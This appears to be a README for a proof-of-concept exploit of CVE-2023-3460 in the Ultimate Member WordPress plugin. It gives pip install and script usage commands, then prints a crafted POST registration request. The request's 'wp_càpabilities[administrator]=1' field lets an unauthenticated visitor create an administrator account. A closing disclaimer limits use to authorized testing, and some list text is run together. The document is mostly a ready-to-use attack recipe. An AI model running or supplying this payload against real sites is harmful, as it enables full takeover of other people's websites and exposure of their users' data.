
Proof-of-concept exploit for CVE-2023-3460, a WordPress Ultimate Member privilege escalation vulnerability. Creates an admin account via crafted registration request. For authorized testing only.
This is a proof-of-concept (PoC) exploit for CVE-2023-3460, a critical vulnerability in the WordPress plugin Ultimate Member. It allows unauthenticated users to escalate their privileges to Administrator by crafting a malicious registration request.
🔥 Impact: Full site compromise through unauthorized admin account creation.
requests libraryurllib3 librarybeautifulsoup4 libraryInstall requirements:
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce) from the register pagewp_capabilities with administrator rolePOST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
This script is provided for educational and authorized testing purposes only. Unauthorized exploitation of systems is illegal and unethical. Use it only on systems you own or have permission to test.